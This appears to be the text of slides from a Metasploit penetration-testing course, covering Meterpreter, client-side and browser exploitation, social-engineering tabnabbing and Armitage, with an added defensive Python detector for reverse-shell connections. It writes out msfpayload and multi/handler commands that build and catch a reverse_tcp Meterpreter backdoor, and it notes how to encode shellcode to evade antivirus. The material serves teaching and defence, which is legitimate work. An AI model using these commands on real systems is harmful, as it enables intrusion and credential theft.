METASPLOIT
with
Course Introduction
Course Outline
Introduction to Penetration Testing
Armitage
Metasploit 101
PowerSploit
Meterpreter
Writing custom meterpreter scripts
Client side attacks
Exploiting client side vulnerabilities
Exploiting Browser based vulnerabilities
Post exploitation
Introduction to PENETRATION TESTING
Importance
Penetration tests are valuable for several reasons:
Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities which could lead to a security breach
Identifying vulnerabilities
Testing the ability of network defenders
Providing evidence to support increased investment in security personnel and technology
Pre-Engagement Interactions
Intelligence Gathering
Reconnaissance (information gathering) is the main activity of this phase of a penetration test
Its results feed every later stage of the penetration test
Different tools and scripts are used for information gathering on different platforms
Threat Modeling
Depends on the intelligence gathered and on the pre-engagement information
Methodology
Business Asset Analysis
Business Process Analysis
Threat Agents/Community Analysis
Threat Capability Analysis
Motivation Modeling
Finding relevant news of comparable Organizations being compromised
Vulnerability Analysis
Involves discovering flaws in the target system
Different tools and scripts are used for performing vulnerability analysis on different platforms
A threat-level classification needs to be created for the exploitation phase
Threats are analyzed and exploited in order of priority, by threat level
Feeds directly into the exploitation phase
Exploitation
Depends entirely on the vulnerability analysis phase and focuses on exploiting the target.
Exploits the target with the appropriate exploit after a compatibility check
The pentester needs to evade or bypass security systems and trigger the exploit for a successful exploitation
Post Exploitation
Involves extending the attack
The pentester can analyze further information during post exploitation
This might include juicy information
During post exploitation the attacker can enhance his persistence on the compromised system
Reporting
Consists of an executive summary and a technical report.
The executive summary mainly focuses on threat-level severity, general findings, a recommendation summary and a road map
The technical report describes how vulnerability analysis, exploitation and post exploitation were carried out
Based on the report, the technical team can proceed to patch management.
Setting up a PENETRATION TESTING Lab
Virtualization
"Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network resources." -- Wikipedia
Requirements for creating virtualization environment
Buzz Words
Host Operating system
Snapshot
Clone
METASPLOIT 101
Metasploit 101
Introduces Metasploit Framework
Buzzwords, Architecture, Framework Architecture, Interfaces and Modules
Scope: exploiting target vulnerabilities using the built-in exploits and payloads
Buzz Words
Vulnerability
Exploit
Payload
Metasploit Architecture
Libraries: REX, MSFCORE, MSF BASE
Interfaces: Console, CLI, WEB, GUI, Armitage
TOOLS
PLUGINS
Modules: PAYLOADS, EXPLOITS, ENCODERS, POST-Mods, Auxiliary
Exploits
The actual code that exploits a vulnerability on the target system.
MSF organizes exploits into modules classified by OS and service
Exploit Ranking Values
1. ManualRanking
2. LowRanking
3. AverageRanking
4. NormalRanking
5. GoodRanking
6. GreatRanking
7. ExcellentRanking
Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
Exploits Ranking
1. ManualRanking : Exploit is so unstable or difficult to exploit that it is basically a DoS
2. LowRanking : Exploit is nearly impossible to exploit (or under 50%) for common platforms
3. AverageRanking : Exploit is generally unreliable or difficult to exploit
4. NormalRanking : Exploit is otherwise reliable, but depends on a specific version and can't reliably auto-detect
5. GoodRanking : Exploit has a default target and it is the "common case" for this type of software
6. GreatRanking : Exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check
Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
Payloads
Payloads
Singles
Self-contained payloads that perform a specific task
Stagers
Establish the connection over which the stage is then downloaded
Stages
Payload components that are downloaded by stager modules
Post Exploitation
Critical component of penetration test.
Assists the pentester in gathering information about the exploited system.
Extends the attack within the targeted environment
Auxiliary Modules
MSF auxiliary modules cover a wide variety of services and are used for performing specific tasks
Auxiliary Modules
admin
crawlers
scanners
fuzzers
sniffers ....
MSF Tools
MSF Plugins
MSF Interfaces
Console
Armitage
WEB
CLI
GUI
Present Scenario
Meterpreter
Meterpreter >
It is the default go-to payload for Windows
Provides Enhanced Command Shell for the attacker
Consists of default set of core commands
Can be extended at runtime by shipping DLLs on the Victim machine
Provides basic post-exploitation API
Working of Meterpreter
Obtaining a Meterpreter shell goes through 3 different stages
Meterpreter basics
Core Commands
File System Commands
Networking Commands
System Commands
User Interface Commands
Launching Attack
Stage 1: Creating the executable backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage 2: Enabling a listener so the backdoor can connect back to the attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit
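From the defender's side, the two-stage sequence above leaves a recognizable trace on the victim: a freshly dropped executable in a user-writable directory opens an outbound connection to a port nothing else on the desktop uses (44444 in the demo). The following is an added example, not code from these course slides or from the Metasploit project: a small detector run over constructed, Sysmon Event ID 3-style network-connection records. The flattened record format, the EXPECTED_PORTS allowlist and the USER_WRITABLE path fragments are assumptions made for this example.

```python
from dataclasses import dataclass

# Constructed sample log (not real telemetry), one record per line:
# time|image|dst_ip|dst_port|user -- the fields a Sysmon Event ID 3
# (network connection) record carries, flattened for this example.
SAMPLE_LOG = """\
2024-01-01T10:00:01|C:\\Program Files\\Mozilla Firefox\\firefox.exe|203.0.113.10|443|bob
2024-01-01T10:00:05|C:\\Users\\bob\\Downloads\\evil.exe|192.168.206.159|44444|bob
2024-01-01T10:00:07|C:\\Windows\\System32\\svchost.exe|192.168.206.1|53|SYSTEM
2024-01-01T10:00:09|C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe|198.51.100.7|4444|bob
2024-01-01T10:00:11|C:\\Users\\bob\\Downloads\\evil.exe|192.168.206.159|443|bob
"""

# Ports a desktop process is normally expected to talk to (assumption).
EXPECTED_PORTS = {53, 80, 443, 445, 587, 993}

# Path fragments marking locations an unprivileged user can write to
# (assumption; extend for your environment).
USER_WRITABLE = ("\\users\\", "\\downloads\\", "\\temp\\", "\\appdata\\")


@dataclass
class Alert:
    time: str
    image: str
    destination: str
    severity: str  # "high" or "low"
    reason: str


def parse_record(line):
    """Split one flattened record into its fields; the port becomes an int."""
    time, image, ip, port, user = line.split("|")
    return time, image, ip, int(port), user


def is_user_writable(image):
    """True when the image path contains a user-writable directory fragment."""
    return any(frag in image.lower() for frag in USER_WRITABLE)


def detect(log_text):
    """Return one Alert per connection initiated by an image that lives in a
    user-writable directory.  An unusual destination port (like the 44444 the
    demo handler listens on) makes it high severity; a common port such as
    443 is still reported, at low severity, because a handler can just as
    well listen there."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        time, image, ip, port, user = parse_record(line)
        if not is_user_writable(image):
            continue
        dest = f"{ip}:{port}"
        if port not in EXPECTED_PORTS:
            alerts.append(Alert(time, image, dest, "high",
                                f"image in user-writable path connected to unusual port {port}"))
        else:
            alerts.append(Alert(time, image, dest, "low",
                                f"image in user-writable path connected to common port {port}"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"[{a.severity.upper()}] {a.time} {a.image} -> {a.destination}: {a.reason}")
```

Run against the constructed log, the detector flags both the demo's evil.exe connecting to port 44444 and the Temp-directory update.exe connecting to 4444 as high severity, and the later evil.exe connection to 443 as low severity; the browser and svchost records are left alone. Tuning the allowlist and the writable-path fragments to the environment is what separates a useful rule from a noisy one.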
Present Scenario
Core Commands
Networking Commands
System Commands
The whole agenda focuses on client-side exploitation, i.e. client-side software:
Email
Java
Office suite
3rd party applications
Browsers
Exploiting Vulnerable services
Exposed to Hostile Servers
Lab Environment
Different stages
Security levels
Goal is to Pwn
Agenda
Exploiting :
Software based vulnerabilities
Web based vulnerabilities
Browser based vulnerabilities
Level   | PATCHED | ANTIVIRUS | FIREWALL
STAGE 1 | NO      | NO        | NO
STAGE 2 | NO      | NO        | YES
STAGE 3 | NO      | YES       | YES
STAGE 4 | YES     | YES       | YES
Stage 1
Level   | PATCHED | ANTIVIRUS | FIREWALL
STAGE 1 | NO      | NO        | NO
NO : Absent
Victim
Attacker
Msfencode
Shellcode generated by msfpayload may contain null characters; deploying such shellcode, or sending it across the
network unmodified, might lead to AV / IDS / IPS detection. The msfencode tool helps avoid bad characters.
Msfvenom: combines Msfpayload and Msfencode
Binary Payload
Developed by using msfpayload
Requires a bit of social engineering
DEMO
Exploiting Software Based Vulnerabilities
Let's check for any vulnerable service running on the victim's machine
We will exploit core software-based vulnerabilities
Victim Environment
Exploiting Browser Based Vulnerabilities
Features
BeEF's modular framework allows the addition of custom browser exploitation commands.
The extension API allows users to change BeEF's core behavior.
Keystroke logging
Browser proxying
Integration with Metasploit
Plugin detection
Intranet service exploitation
PhoneGap modules
Hooking through QR codes
Social engineering modules spur user responses such as entering sensitive data and responding to reminders to update software
A RESTful API allows control of BeEF through HTTP requests (JSON format).
Source: http://en.wikipedia.org/wiki/BeEF
BeEF Project
Configuring
Launching
root@kali: cd /usr/share/beef-xss/
root@kali: ./beef
Social Engineering Toolkit (S.E.T.)
Social Engineering
Kevin Mitnick
Motivation
Self Interest
Mr. X wants to access and/or modify information associated with a family member, colleague or even a neighbor.
Revenge
Mr. X targets a friend, colleague, organization or even a total stranger to satisfy an emotional desire for vengeance
Curiosity
Mr. X receives pressure from friends, family or organized crime syndicates for reasons such as financial gain, self-interest and/or revenge
Introduction to SET
The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec, Dave Kennedy
Interfaces :
Command line
Web
Introduction to Tabnabbing
"It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security. It's like being hit by the wrong end of the sword."
Aza Raskin
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
Behind the Curtains
The attacker uses customized scripts and a hosting service to make the page pass as the original page.
How to do it
Index1.html
Index2.html
Tabnab.js
Log.txt
script.php
Script.php
Log.txt
Hosting site
Script.js
Index-2.html
Index-1.html
Captured Credentials
Armitage
Armitage
Agenda
Introduction to Armitage
Installing and configuring Armitage
Host Management
Dynamic Workspaces
Importing Hosts
Scanning and exploiting targets
Exploit Automation
Introduction to Armitage
GUI front-end for the Metasploit Framework developed by Raphael Mudge
Kali Linux ships with Armitage and all its dependencies built in.
root@kali: service postgresql start
root@kali: service metasploit start
root@kali: armitage
Launching Armitage
Armitage UI
Adding Host
Scanning Host
Finding Attacks
Launching Attack
Compromised System
Thank You